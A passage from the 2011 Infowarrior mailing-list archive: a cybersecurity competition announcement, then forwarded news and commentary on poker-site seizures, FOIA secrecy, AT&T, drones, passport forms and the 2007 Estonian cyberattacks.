The second qualifying round will determine the final eight teams from each division - high school, college and university, and professional - that will go on to compete in person at the October conference. Winners of each division will receive their trophies and awards at a formal ceremony to be held at UMBC in November.

MDC3 was designed by Science Applications International Corporation (SAIC) [NYSE: SAI] and the University of Maryland, Baltimore County (UMBC), in partnership with the Department of Business & Economic Development (DBED), the Tech Council of Maryland (TCM) and the National Cyber Security Alliance (NCSA) to encourage more students and young professionals to pursue careers in cybersecurity. The event will further DBED and Governor Martin O'Malley's "Cyber Maryland" initiative to position Maryland as the nation's epicenter of cybersecurity and innovation. Throughout the conference, students and young professionals will have the opportunity to network with cybersecurity leaders and recruiters while learning about careers in cyber technology.

About the Maryland Cyber Challenge & Conference (MDC3)

The inaugural Maryland Cyber Challenge & Conference (MDC3) will be held October 21-22 at the Baltimore Convention Center. The event will give teams of high school students, college and university students, and professionals the opportunity to learn about cybersecurity and develop practical skills for defending computers while competing for scholarships and prizes in a fun environment. The conference will feature keynote speakers, breakout sessions and vendor booths for an audience of students, parents and professionals from academia, industry and government. Sponsorship and exhibitor opportunities are both available.
MDC3 was created by Science Applications International Corporation (SAIC) [NYSE: SAI] and the University of Maryland, Baltimore County (UMBC) in partnership with the Department of Business & Economic Development (DBED), the Tech Council of Maryland (TCM) and the National Cyber Security Alliance (NCSA) with the goal of encouraging Maryland students and young professionals to pursue education and careers in cybersecurity. MDC3 supports the State of Maryland's initiative to become the nation's epicenter for innovation in cybersecurity. For more information, please visit www.MDC3.org.

From rforno at infowarrior.org Fri Apr 22 09:47:58 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 22 Apr 2011 10:47:58 -0400
Subject: [Infowarrior] - Feds reactivate seized poker sites temporarily
Message-ID: <2F067338-CB52-4796-9AFB-964A3CDDE323@infowarrior.org>

Feds Plan To Temporarily Turn Poker Sites Back On So People Can Get Their Money Out
from the didn't-want-a-poker-player-revolt dept

When the feds seized three poker domains, one of the big concerns was if players would be able to get back their money. When the initial questions were raised, the Justice Department made some statements about how they didn't want people to be able to claim money that was obtained through illegal means -- suggesting that players would not be able to get their money back. However, it appears that someone let those in power know that there are a lot of people who play online poker... and they vote. So, suddenly, the government has agreed to reactivate two of the seized domains to help players retrieve their money. They're spinning the story to suggest people have "always" been able to reclaim their money, but many players say that was not the case at all, and they were completely frozen out of their accounts.
http://www.techdirt.com/articles/20110421/15055113990/feds-plan-to-temporarily-turn-poker-sites-back-so-people-can-get-their-money-out.shtml

From rforno at infowarrior.org Fri Apr 22 14:46:35 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 22 Apr 2011 15:46:35 -0400
Subject: [Infowarrior] - Court Rejects Agency's National Security Claim
Message-ID: <516FFB11-7653-4B56-B8E0-688F902C0A54@infowarrior.org>

Court Rejects Agency's National Security Claim
http://www.fas.org/blog/secrecy/?p=5143

In Freedom of Information Act litigation, courts will almost always defer to a government agency when it asserts that national security requires that certain information remain classified. Judges say they are reluctant to "second guess" agency national security experts, and there is a substantial body of case law that discourages them from doing so.

But earlier this month, Judge Richard W. Roberts of the DC District Court considered an agency's national security claim, found it unpersuasive, and rejected it (pdf).

In that FOIA case, Center for International Environmental Law vs. the Office of the United States Trade Representative, the plaintiff sought a USTR document concerning the U.S. negotiating position on the Free Trade Agreement of the Americas. USTR said the document was classified because the international negotiations were confidential and the document's disclosure would result in damage to U.S. foreign relations.

"USTR argues that release of document 1 would constitute a breach of its agreement with the other nations participating in the FTAA negotiations. [USTR] states that [t]here is an understanding among the 34 participating governments, consistent with longstanding practice in multiparty trade negotiations, that they will not release to the public any negotiating documents they produce or receive in confidence in the course of the negotiations unless there is a consensus among the 34 governments to do so."
But remarkably, the judge didn't buy it, particularly since it was a question of releasing a U.S. document, not a foreign document.

USTR "has not shown it likely that disclosing document 1 would discourage foreign officials from providing information to the United States in the future because those officials would have no basis for concluding that the United States would dishonor its commitments to keep foreign information confidential," he concluded.

"Although a court must defer to agency affidavits predicting harm to the national security, '[d]eference' does not mean acquiescence,'" Judge Roberts wrote.

See the April 12, 2011 Memorandum Opinion here.

The ruling that international negotiations cannot necessarily be used as a pretext for classifying U.S. government information may have important ramifications in other policy areas.

So, for example, the U.S. government currently makes public less information about the makeup of the U.S. nuclear arsenal under the New START Treaty than it previously did under the START regime, observed Hans Kristensen of FAS last month. Although such stockpile information is generated and is regularly exchanged with the government of Russia under the provisions of New START, it is currently classified and has still not been made publicly available. If it became necessary to challenge the classification of this information in court, then Judge Roberts's new ruling might offer an apt precedent.

"Although the Constitution permits the judiciary to play a role in judging government secrecy claims and Congress has repeatedly endorsed that role, most prominently in the Freedom of Information Act, judges have been reluctant to question Executive Branch secrecy," observed Meredith Fuchs in a 2006 law review article that argued for a more active judicial role in reviewing classification decisions. "Without judicial intervention..., the incentives on the Executive Branch to overreach far outweigh any checks on excessive secrecy."
From rforno at infowarrior.org Fri Apr 22 14:49:35 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 22 Apr 2011 15:49:35 -0400
Subject: [Infowarrior] - AT&T Admits Network Can't Handle iPhone, iPad
Message-ID: <7F47886B-34D0-48DC-9DAC-4233B6F64C3D@infowarrior.org>

Friday, April 22, 2011 10:06 AM EDT
AT&T Admits Network Can't Handle iPhone, iPad
By Ricardo Bilton
http://www.ibtimes.com/articles/137269/20110422/at-t-admits-network-can-t-handle-iphone-ipad.htm

AT&T has admitted that the rise of tablet and smartphones like the iPad and iPhone has taken a major toll on its network.

In its public filing to the Federal Communications Commission yesterday, the company admits that its network has been under increasing strain as more and more high-bandwidth devices have been connected. This not only includes smartphones like the iPhone, but tablets like the iPad as well. AT&T says that in many cases tablets put a greater stress on their network than smartphones do.

AT&T traces its network troubles back to around 2007, and though the filing does not mention the iPhone by name, the company's 8,000% increase in data consumption from 2007 to 2010 corresponds with the launch of the first iPhone in 2008. Smartphones, AT&T says, use 24 times more data for each user, and that doesn't even include tablet usage.

The company doesn't see the traffic troubles letting up. "Over the next five years, data usage on AT&T's network is projected to skyrocket as customers 'mobilize' all of their communications activities, from streaming HD video and cloud computing to a range of M2M applications like energy management, fleet tracking, and remote health monitoring," AT&T writes in the filing.

AT&T says the overloading of its network justifies its acquisition of T-Mobile. Customers will benefit from faster data and a reduced frequency of dropped calls.
The company also says that the acquisition would increase broadband penetration to rural areas of the United States, a significant goal of the Obama administration.

From rforno at infowarrior.org Fri Apr 22 14:51:59 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 22 Apr 2011 15:51:59 -0400
Subject: [Infowarrior] - Who's Funding More Terrorism: Downloaders Or Hollywood?
Message-ID: <05565911-5301-4820-9140-10EC91A9EFFE@infowarrior.org>

Who's Funding More Terrorism: Downloaders Or Hollywood?
from the questions-to-ask dept

We've written a few times now about the absolutely brilliant SSRC report on media "piracy," and how it's basically a business model problem, rather than a legal one. The report is thorough, detailed and rather complete on a variety of topics related to this issue. And while we might hope that such a fantastic piece of scholarly research could take certain silly arguments off the table, apparently that's wishful thinking. The main guy behind the report, Joe Karaganis, has recently posted some blog posts on the whole "terrorism" issue. You see, it's quite common for people pushing for greater copyright enforcement to make the claim that infringement funds terrorism and organized crime. We've attempted to debunk some of those claims in the past, but the SSRC folks did an amazingly thorough debunking (pdf) of the whole thing. Basically, it argues that, pre-internet, there was likely a connection between counterfeiting CDs/DVDs and organized crime, but that business has pretty much dried up thanks to the internet. So the claims of infringement funding such things are really lacking. A snippet:

< -- >

http://www.techdirt.com/articles/20110421/00493313981/whos-funding-more-terrorism-downloaders-hollywood.shtml

From rforno at infowarrior.org Sat Apr 23 10:23:56 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sat, 23 Apr 2011 11:23:56 -0400
Subject: [Infowarrior] - more on ...
iPhone keeps record of everywhere you go
References: <006c01cc01bc$18b9c910$4a2d5b30$@alleghenydigital.com>
Message-ID: <629AF5F3-F6D4-4EFA-AFC5-7C3C4836050D@infowarrior.org>

Begin forwarded message:

> From: "Greg"
> Subject: RE: [Infowarrior] - iPhone keeps record of everywhere you go
>
> And now...an open source tool to visualize your iPhone travels:
> http://petewarden.github.com/iPhoneTracker/

One of several available (or soon to be) I am sure. --- rick

From rforno at infowarrior.org Sat Apr 23 10:55:13 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sat, 23 Apr 2011 11:55:13 -0400
Subject: [Infowarrior] - Are your users S.T.U.P.I.D?
Message-ID: <0ECA2BDB-10FA-4893-BAD1-9DDB711439BA@infowarrior.org>

Are your users S.T.U.P.I.D?
How good design can make users effective
by Stephen Turbek on 2011/04/20

It is an honest question: how smart are your users? The answer may surprise you: it doesn't matter. They can be geniuses or morons, but if you don't engage their intelligence, you can't depend on their brain power. Far more important than their IQ (which is a questionable measure in any case) is their Effective Intelligence: the fraction of their intelligence they can (or are motivated to) apply to a task.

Take, for example, a good driver. They are a worse driver when texting or when drunk. (We don't want to think about the drunk driver who is texting.) An extreme example you say? Perhaps, but only by degree. A person who wins a game of Scrabble one evening may be late for work because they forgot to set their alarm clock. How could the same person make such a dumb mistake? Call it concentration, or focus; we use more of our brain when engaged and need support when we are distracted.

So, what does a S.T.U.P.I.D. user look like?
< -- >

http://www.boxesandarrows.com/view/are-your-users-s-t-u

From rforno at infowarrior.org Sun Apr 24 09:39:53 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 24 Apr 2011 10:39:53 -0400
Subject: [Infowarrior] - Obama Says It's Okay To Treat Manning The Way He's Been Treated Because He 'Broke The Law'
Message-ID:

Obama Says It's Okay To Treat Manning The Way He's Been Treated Because He 'Broke The Law'
from the missing-the-point dept

In the continuing saga of President Obama's tone deafness to the concerns of many (including the UN) around the world regarding the treatment of Bradley Manning -- who's accused of being the source of many of Wikileaks major releases -- the President responded to some protesters in San Francisco by defending the treatment of Manning:

OBAMA: So people can have philosophical views [about Bradley Manning] but I can't conduct diplomacy on an open source [basis]... That's not how the world works. And if you're in the military... And I have to abide by certain rules of classified information. If I were to release material I weren't allowed to, I'd be breaking the law. We're a nation of laws! We don't let individuals make their own decisions about how the laws operate. He broke the law.

[Q: Didn't he release evidence of war crimes?]

OBAMA: What he did was he dumped...

[Q: Isn't that just the same thing as what Daniel Ellsberg did?]

OBAMA: No it wasn't the same thing. Ellsberg's material wasn't classified in the same way.

Now, the folks who posted this are taking the biggest issue with Obama's statement of "he broke the law," pointing out that he hasn't been convicted of breaking any laws. I actually don't find that to be all that problematic. The government has charged him with breaking the law, so clearly it believes he has broken the law. Obama stating the same thing that his own Defense Department has stated doesn't seem that ridiculous. But, that still doesn't excuse the treatment of Manning in any way, shape or form.
I don't know for certain if he broke the law. But even if he did, he deserves to have a trial on the matter, and prior to that trial he shouldn't be held in conditions that much of the world considers to be torture. That's the key issue, and one not dealt with here.

Separately, some of Obama's other remarks are troubling as well. The claim that he "can't" conduct diplomacy if information is open is false. It may be more difficult and he may not like it, but he's not in this job because it's easy. Finally, as the report also notes, while Obama is technically correct that the material Ellsberg released "wasn't classified the same way," he appears to be missing out on how that actually goes in favor of Manning, since the content Manning is charged with leaking was classified at a lower level than what Ellsberg released ("classified" rather than the Pentagon Papers' "top secret").

< -- >

http://www.techdirt.com/articles/20110422/11513814002/obama-says-its-okay-to-treat-manning-way-hes-been-treated-because-he-broke-law.shtml

From rforno at infowarrior.org Sun Apr 24 11:58:27 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 24 Apr 2011 12:58:27 -0400
Subject: [Infowarrior] - Pakistanizing the Libyan War
Message-ID: <5830048A-E7DD-4130-89C1-E6F33B8E6353@infowarrior.org>

Obama Takes the Cape
Pakistanizing the Libyan War
By FRANKLIN C. SPINNEY
http://www.counterpunch.org/spinney04222011.html

Taking the Cape is a time-honored term of art used in the Pentagon for luring your opponent into going for your solution, especially when it is not in his or her best interest. The analogy is to waving the red cape in front of the bull. While the psychological game of the dazzle and the stroke has been perfected in the Pentagon as a means for winning its domestic budget wars, the American military has been far less successful in beating its adversaries in a game that goes back to at least the time of Sun Tzu.
Consider, please, the following.

On Thursday, April 22, Defense Secretary Robert Gates announced President Obama approved the initiation of drone strikes in Libya. The Vice Chairman of the Joint Chiefs of Staff, General James Cartwright, claimed the drones were "uniquely suited" for attacks in urban areas because they can fly lower and get better visibility of targets, presumably, than pilots' eyeballs in airplanes. Gates went on to claim drone strikes in Libya would be done for "humanitarian reasons." In other words, someone has sold Obama on Pakistanizing the Libyan War, i.e., pursuing a military strategy of relying on drone attacks to destroy an adversary hiding in the environmental background.

What is astonishing is that Obama took the cape, despite the fact that only 12 days earlier, a report in the Los Angeles Times by David Cloud illustrated once again the absurdity of Cartwright's and Gates' claims. Cloud's report is worthy of very careful study, because it is loaded with all sorts of unexplored ramifications -- none of them good.

Using actual transcripts of conversations among drone operators, David Cloud revealed the sinister psychological effects that so-called precision bombing and techno war has on its American participants. Their sterile dialogue shows vividly how the idea of precision techno warfare fought from a safe distance desensitizes our "warriors" to the bloody physical effects of their actions on the people they are maiming and killing and the property they are destroying. There is no bravery or soldierly honor or spirit of self sacrifice among the bravado of the drone operators safely ensconced in Creech AFB, Nevada; they are simply cogs in a dysfunctional dehumanizing machine. That dysfunction is revealed by the complete absence in their dialogues of any psychological appreciation of their "adversary." Nor is there even a hint of a desire to make such an appreciation.
Consider for example, the emptiness in the following dialogue reported by Cloud:

The Afghans unfolded what looked like blankets and kneeled. "They're praying. They are praying," said the Predator's camera operator, seated near the pilot.

By now, the Predator crew was sure that the men were Taliban. "This is definitely it, this is their force," the cameraman said. "Praying? I mean, seriously, that's what they do."

"They're gonna do something nefarious," the crew's intelligence coordinator chimed in.

The lack of inquisitiveness into the mind of the enemy stands in stark contrast to the Pentagon's subtle psychological appreciation of its domestic adversaries (in this case the hapless President Obama, but also his predecessors reaching back to President Kennedy, as well as members of Congress) that has been so successful in waging and winning its budget battles to extract money from the American people.

Extreme psychological one-sidedness on our side is nothing new in our military operations, however. It has been a central feature of the American way of techno war for a very long time. Indeed, the theory of the adversary being merely a physical set of targets (a dehumanized set of critical nodes devoid of any mental agility or moral strength) that can be defeated simply by identifying and physically destroying these nodes is a doctrine that has been evolving and becoming more extreme since the development of daylight precision "strategic" bombardment doctrine by the US Army Corps in the 1930s. In WWII one set of critical nodes was the ball bearing factories, for example; today in Pakistan the critical nodes are Taliban and al Qaeda leadership targets (of course, history has shown repeatedly that the enemy is adaptable and so-called critical nodes can be worked around or replaced again and again). In Libya, we may have reached a new low, however. God only knows what the critical nodes are in the oxymoronic case of humanitarian attacks, other than assassinating Qaddafi.
In fact, as Patrick Cockburn has shown, we don't even know who our allies among the Libyans are, and some may well be former anti-American Islamists.

Nevertheless, once again, the fallacious presumptions of techno war are coming into full flower. At the center of the theory of techno war is the comforting idea that precision bombardment (in WWII, via the technical wizardry of the Norden bombsight and the blind bombing systems like the H2X radar) would enable us to attack precision "military targets" deep in hostile territory while avoiding destruction of civilian lives and property. In fact, many of its proponents claimed, absurdly as it turned out, that daylight precision bombing of Germany would save lives by obviating the need for a land invasion of Europe.

The drone coupled with precision guided weapons merely evolves this original mentality to a new level of recklessness, because its gripping effect on our psychology further disconnects the killer, sitting in his air conditioned operations center thousands of miles away from the killed, from the consequences of the killer's actions. This clinical detachment creates the illusion that war is cleaner and easier to fight from our perspective -- civilian deaths become morally acceptable because they are merely accidents of good intentions. The clinical term "collateral damage" says it all.

Cloud closes his report by describing the American apologies and financial payoffs to family survivors of civilians we inadvertently killed -- although given the emptiness of the dialogue revealed by Cloud, the idea that these deaths are collateral damage of a precision killing machine approaches the bizarre, to put it charitably. On the other hand, the idea of a financial payoff of a few thousand dollars fits the dehumanizing model of techno war, because it ignores the mental and moral dimensions of war.
In this case, the psychological natures of Pashtun concepts of honor and the Pashtun warrior ethos guarantee that financial payoffs will not mitigate their thirst for revenge, which will last for generations. But such psychological considerations have no place in the mechanistic mindset of techno war that views the adversary as a mere collection of physical targets and rationalizes civilian deaths as being unfortunate accidents of good intentions. The illusions of techno war are very soothing to its generalissimos like Clinton, Bush, and Obama, and its accompanying video games provide a great distraction to an American public being impoverished by government policies to redistribute wealth to the super rich. Moreover, by making war at a distance easier to prosecute and less painful to us (at least in the short term), the fallacies of techno war set the stage for our current state of perpetual war. Continuous small wars, or the threat of such wars, are necessary to prop up the sclerotic cold-war military-industrial-congressional complex, or MICC (see my essay The Domestic Roots of Perpetual War). Perpetual small wars, or the threat thereof, create a never ending demand for the MICC's high-tech, war-losing products, which are legacies of the now defunct Cold War, but without which the MICC could not survive in the post-cold war era. Keeping MICC budgets at cold war levels and higher also serves to reinforce the government policies to redistribute wealth to the rich and super rich. 
And that is why, every time the techno strategy fails to deliver on its promises, as it did with strategic bombing in WWII, Korea, Vietnam, the first Iraq War, Kosovo, the Second Iraq War, Afghanistan, and now in Libya, the solution is not a serious "lessons-learned" examination of why it did not deliver its promises of quick, clean victories, but instead, the solution is always the same: to recommend spending even more money for more expensive and complex versions of the same old idea, i.e., more and better sensors, more and better guidance systems, and more and better command, control, communications, computer, and intelligence systems. Franklin "Chuck" Spinney is a former military analyst for the Pentagon. From rforno at infowarrior.org Sun Apr 24 21:46:43 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 24 Apr 2011 22:46:43 -0400 Subject: [Infowarrior] - Are drones a technological tipping point in warfare? Message-ID: Are drones a technological tipping point in warfare? By Walter Pincus, Sunday, April 24, 6:06 PM http://www.washingtonpost.com/world/are-predator-drones-a-technological-tipping-point-in-warfare/2011/04/19/AFmC6PdE_print.html Debates are growing at home and abroad over the increasing use of remotely piloted, armed drones, with a new study by the British Defense Ministry questioning whether advances in their capabilities will lead future decision-makers to "resort to war as a policy option far sooner than previously." Active and retired U.S. Air Force officers involved in developing drones stress that the aircraft brings in more decision-makers, better targeting data and more accurate delivery systems than fighter jets. But use of the unmanned aerial vehicles has drawn growing public scrutiny based on their lethal attacks in Pakistan against al-Qaeda, in Afghanistan against the Taliban, in Yemen against al-Qaeda in the Arabian Peninsula, and most recently in Libya, as announced Thursday by Defense Secretary Robert M. Gates. 
The British study noted that drones are becoming increasingly automated. With minor technical advances, it said, a drone could soon be able to "fire a weapon based solely on its own sensors, or shared information, and without recourse to higher, human authority." It cautioned that the Defense Ministry "currently has no intention to develop" such systems. Nonetheless, the aircraft, piloted by people far from the battlefield, represents an approaching technological tipping point "that may well deliver a genuine revolution in military affairs," according to the Joint Doctrine Note, which was conducted under the direction of the British Chiefs of Staff. Titled "The United Kingdom Approach to Unmanned Aircraft Systems," it was first disclosed last week by the Guardian newspaper. The British study said it was essential that military officials not "risk losing our controlling humanity and make war more likely" by using armed drones. It also asserted, however, that the laws of war call on commanders on both sides of the fight to limit loss of life and that "use of unmanned aircraft prevents the potential loss of aircrew lives and is thus in itself morally justified." At a Washington conference of the International Institute for Strategic Studies (IISS) last week, the issue of drones was also widely discussed. Lt. Col. Bruce Black, program manager for the Air Force Predator and Reaper aircraft, noted that some 180 people are involved in each drone mission. The result, he said, is that "there is more ethical oversight involved with unmanned air vehicles than with manned aircraft." At the same conference, former CIA director Michael V. Hayden described how, with a Predator circling overhead, those involved in ordering use of its missiles from thousands of miles away can call up computer maps that show the potential effects of each weapon. Before any of the Hellfire missiles are launched, he said, the backup team asks for "the bug splat" of the attack, 
a readout of the impact the missile would have on its ground target. Nothing comparable can be done with ground-supporting manned aircraft, he said. But the drones have become part of the propaganda war where they are used. Without referencing the Taliban or al Qaeda, the British paper noted that insurgents have cast themselves as the underdog against a "cowardly bully ... that is unwilling to risk his own troops, but is happy to kill remotely." Retired Lt. Gen. David Deptula, former Air Force deputy chief of staff for intelligence, surveillance and reconnaissance, acknowledged that the use of drones comes with potential problems with public perceptions. "Our adversaries have interjected this as a question in [people's] minds, as an attempt to limit the use of what is very, very effective," he said. At the IISS conference, participants were asked whether drone operators had been desensitized to killing, because they were so far away from the battlefield. Col. Dean Bushey, deputy director of the Air Force Joint Unmanned Aircraft Systems Center, pointed out that the crews that run Predators in Nevada go through the exact routines that airplane pilots do prior to a mission. They go through a restricted area, wear brown flight suits, receive a mission brief and are put into a "warrior ethos" before ever stepping into a ground control station. "You are executing a mission to save lives," he said. Black said that when a Predator operator is connected to a fighter on the ground in Afghanistan, "you can hear his voice and you can hear the bullets whistling over his head. You feel that pressure." He vividly described an operator in Nevada, sitting at a computer console and listening and looking at his colleague thousands of miles away through a micro-picture view. "My situational awareness of what he is going through at that time is probably better than a guy that showed up at 10 minutes on station and dropped a weapon and left," Black said. 
"I see my effects, I watched, I listened, I was with him the five hours prior to that. ... I'd say we are very much in the fight." © 2011 The Washington Post Company From rforno at infowarrior.org Mon Apr 25 06:50:18 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 07:50:18 -0400 Subject: [Infowarrior] - New State Dept passport application is INSANE Message-ID: <0C1CF999-52E4-41B1-A30E-C7FC191DFF16@infowarrior.org> (c/o PM) Somebody please tell me this proposed application for a US passport/renewal isn't some giant USG-sponsored hoax. This is almost as bad as applying for a DOD clearance.....and DOD doesn't ask if you've been circumcised! As PM told me, "I guess they [USG] don't want you leaving the country then." Let us hope cooler minds prevail, and/or this is all just some poor April Fools' prank. --- rick 60-Day Notice of Proposed Information Collection: DS-5513, Biographical Questionnaire for U.S. Passport, 1405-XXXX http://www.federalregister.gov/articles/2011/02/24/2011-4154/60-day-notice-of-proposed-information-collection-ds-5513-biographical-questionnaire-for-us-passport BIOGRAPHICAL QUESTIONNAIRE FOR A U.S. PASSPORT http://papersplease.org/wp/wp-content/uploads/2011/03/ds5513-proposed.pdf -- more info -- State Dept. proposes "Biographical Questionnaire" for passport applicants The U.S. Department of State is proposing a new Biographical Questionnaire for passport applicants. The proposed new Form DS-5513 asks for all addresses since birth; lifetime employment history including employers' and supervisors' names, addresses, and telephone numbers; personal details of all siblings; mother's address one year prior to your birth; any "religious ceremony" around the time of birth; and a variety of other information. According to the proposed form, "failure to provide the information requested may result in ... the denial of your U.S. passport application." 
The State Department estimated that the average respondent would be able to compile all this information in just 45 minutes, which is obviously absurd given the amount of research that is likely to be required to even attempt to complete the form. < -- > http://www.papersplease.org/wp/2011/03/18/state-dept-proposes-biographical-questionnaire-for-passport-applicants/ From rforno at infowarrior.org Mon Apr 25 07:35:48 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 25 Apr 2011 08:35:48 -0400 Subject: [Infowarrior] - Cyberwarriors on the Eastern Front: In the line of fire packet floods Message-ID: Original URL: http://www.theregister.co.uk/2011/04/25/estonia_cyberwar_interview/ Cyberwarriors on the Eastern Front: In the line of fire packet floods Former senior Estonian defence official talks cyberwar with El Reg By John Leyden Posted in Enterprise Security, 25th April 2011 09:00 GMT Interview Estonian government ministers and officials deep in a crisis meeting about riots on the street in April 2007 were initially nonplussed when a government press officer interrupted a briefing to say that he was unable to post a press release. The initial reaction was "why are you bothering us with this", Lauri Almann, permanent undersecretary at the Estonian Ministry of Defence at the time, told El Reg. "It was only when he said 'No you don't understand, I think we are under cyberattack' that anybody took notice," Almann explained. Estonia, a small country of around 1.3 million people bordering Russia and the Baltic Sea, has moved swiftly since independence in 1991 to develop an advanced network infrastructure for the delivery of both government and financial services. The country completely skipped the phase of banking involving cheques, for example, so that the vast majority of its citizens use online banking to pay bills and carry out other day-to-day tasks. The disruption when these facilities abruptly ceased to work was therefore all the more severe. 
Cyberblitz Both government and private sector systems in Estonia came under fierce cyberassault in April 2007. This coincided with street-level riots that accompanied the relocation of World War II (Soviet era) memorials. The riots pitted ethnic Russians in the country against ethnic Estonians and the police. The denial of service attacks that kicked in around two days after the street protests began left important government, banking and news media websites unavailable. The unavailability of government and news media websites was important because it prevented the government getting information out at a time of crisis. Estonia does not have BBC and CNN bureaus and the culture of using the radio to get news, if all else fails, isn't as ingrained there as it would be in the UK, for example. More Estonians rely on the web for news, so the attacks left them deprived of updates. The first wave of "brute force" packet flooding assaults was followed by more sophisticated attacks, including website defacement and site takeovers. For example, a fake apology over the relocation of the monuments was posted on the website of one political party. In total the attacks lasted around three weeks. "It could have been much worse," Almann explained. "We thought they might go on for up to three months. Technically the attacks we faced were nothing special," he added. In the line of fire Estonia responded to the cyberattacks, in part, by increasing bandwidth and organising backup hosting for government websites. The process of replicating content in the midst of the ongoing attack was unsurprisingly difficult. "Many countries refused to take our sites because they said that would put them in the line of fire," Almann said. Speculation since the attacks, a landmark event in computer security, suggests they were fomented in the "Russian blogosphere" and may have involved criminal hackers turned patriots. 
Some have suggested that the Russian government may have played a role in encouraging these attacks, a charge dismissed by the Kremlin. Estonian Foreign Minister Urmas Paet, for example, pointed the finger of blame [1] for the attacks directly at the Kremlin. A question of attribution Almann was more circumspect. An estimated 1 to 2 million compromised machines in 100 different jurisdictions, including the Vatican, were used in the cyberattacks against Estonia. The use of botnets, which can be rented and paid for anonymously on the digital underground, makes tracing the real source of attacks difficult if not impossible. Instead of relying on purely technical attribution to find a "smoking gun", political and legal attribution also has a role to play. Almann said that many countries helped Estonia at the time of the attacks, with one important exception: Russia. "Russia failed to help put out the attacks. Repeated requests for assistance were denied, sometimes for obscure legal reasons," he told El Reg. For example, Estonia and Russia have an agreement covering the investigation of cross-border crime which covers the exchange of info as well as the extradition of suspects who might decide to skip over the border to avoid justice. "Treaty requests for information at the time of the cyberattack were repeatedly refused or not acted upon. This refusal to co-operate provides political attribution for the attacks," Almann said. Clueless spotters green-lit porn site for cyber carpet bombing Just one person, an ethnic-Russian Estonian national, has been charged and convicted of the attack. Dmitri Galushkevich, 20, was fined the local equivalent of $1,200 after he was convicted of attacks against the Reform Party of Estonian Prime Minister Andrus Ansip. "He was not accountable as an organiser but a schoolboy providing targets via chat forums," Almann explained, adding that in some instances the attackers were misdirected by their spotters on the ground. 
One wave of attacks, for example, took out an adult entertainment (porn) website instead of an Estonian state security site. Estonia's analysis of the attacks reveals that small-scale ping attacks, used to carry out reconnaissance of targets, preceded the main assaults, which came in phases. The main phase of the attack involved voluntary political botnets, predominantly located in Russia, which Almann described as "easy to block", as well as assaults of growing sophistication from compromised machines around the world. The attacks against Estonia, the first of their kind on a country-wide level, have been studied intensively by military planners since. In 2008, cyberattacks on Georgian websites and communication facilities accompanied a ground war between Russia and Georgia. Estonia, along with Poland, stepped in to offer backup hosting of Georgian government websites. Almann argues this process needs to be more organised. "We need pan-European backup hosting for critical websites," he said. Rules of engagement Almann reckons that rules for the investigation of cyberattacks need to be established by more countries signing up to the Council of Europe Convention on Cybercrime. Russia and China and several other key countries have not signed the treaty, while some countries in Europe, including the UK, have signed but not ratified the regulations. Russia might be encouraged to sign the treaty by making it a condition of World Trade Organisation negotiations, he suggested, adding that the issue of cyberconflict ought to be on the agenda of G8 talks that include Russia and the world's seven biggest economies. Some observers have suggested that a Geneva Convention for cyberwar might be needed, an idea Almann regards as a non-starter even though he's equally adamant that cyberwar is all too real. "With applications such as Stuxnet attacks are growing more sophisticated," Almann said. "There are really serious capabilities out there." 
"However banning the use of cyberweapons is not realistic. Cyberwar is out there and everybody is involved." Offence is the best form of attack Plenty of governments talk about boosting the capability of their cyber-defences but very few, at least publicly, talk about cyber-offensive capabilities. Cyber-offensive capabilities might involve attacking a particular botnet of compromised PCs or disrupting the communication channels an enemy is using to co-ordinate attacks. Almann reckons most countries are developing cyber-offensive capabilities. "Sovereign nations need the capability. It's unavoidable," he said. However, establishing rules to govern the use of such weapons is something else, in Almann's opinion. "A Geneva convention for cyberwar is not going to work," he said. "I'm a lawyer and I wouldn't know what to write. The field is so fast-developing that you are going to get it wrong. "This is not a burning issue and shouldn't divert attention from dealing with shortcomings of critical national infrastructure systems," he added. Preparing for the next cyberwar Preparations for cyber-defence include running cybersecurity exercises and establishing what Almann described as "matrices of co-operation". He said: "It's better to have many people working together, and the ability to delegate decisions, than a cyber-czar," adding that Estonia was establishing an independent cyber unit in its equivalent of the voluntary part-time Territorial Army (the US equivalent would be the National Guard). Russia, by contrast, appears to have used a militia of criminal hackers to fight its battles, at least if rumours over the cyber-conflict in Estonia and Georgia are to be believed. Almann said this approach was dangerous. "Providing the [modern equivalent] of letters of marque to cyber-profiteers, entitling them to loot or pillage when they are not working for you, is dangerous," Almann said. "Criminals can easily turn against you." But what are cyber-defenders preparing for, exactly? 
The UK's defence review last year placed cyberattacks on a par with international terrorism as the greatest threats facing the UK, a judgment Almann agreed with. Almann argued that "every military conflict is going to have a cyber-component" in future. "There are sophisticated attack scenarios but normally you never want to truly knock out your enemies' network because then you eliminate the battlefield. Instead you want to create confusion and misinformation," he said. Cyberwar would not be limited to nation-state against nation-state conflicts, with insurgency-style cyber-conflicts also more than possible. "The opportunities to attack in cyberspace are huge for anyone with imagination," he said. The former top-ranking civil servant turned lawyer and university lecturer spoke to us of phishing, espionage and attacks more sophisticated than those faced by Estonia as among the threats, which might come from terrorist groups such as al-Qaeda as well as state-sponsored hackers or intelligence agencies. "You should never prepare for the last war," he concluded. Some have criticised the debate on cyberwar for focusing on Hollywood-style attack scenarios of lone hackers taking out power grids, for example. However, Almann reckons that cyberdefence brainstorming sessions are best run in an open environment where even "crazy ideas" can be suggested. "You need to come up with the meanest scenarios before you discuss whether they are realistic or not," Almann said. Almann, an experienced lawyer and diplomat, would be the first to admit he's not a technologist. For an expert take on what the real (as opposed to Hollywood-inspired) threats in cyberspace might be, we asked Chris Wysopal (AKA Weld Pond), a former member of Boston-area hacking collective L0pht, turned founder of application security firm VeraCode. 
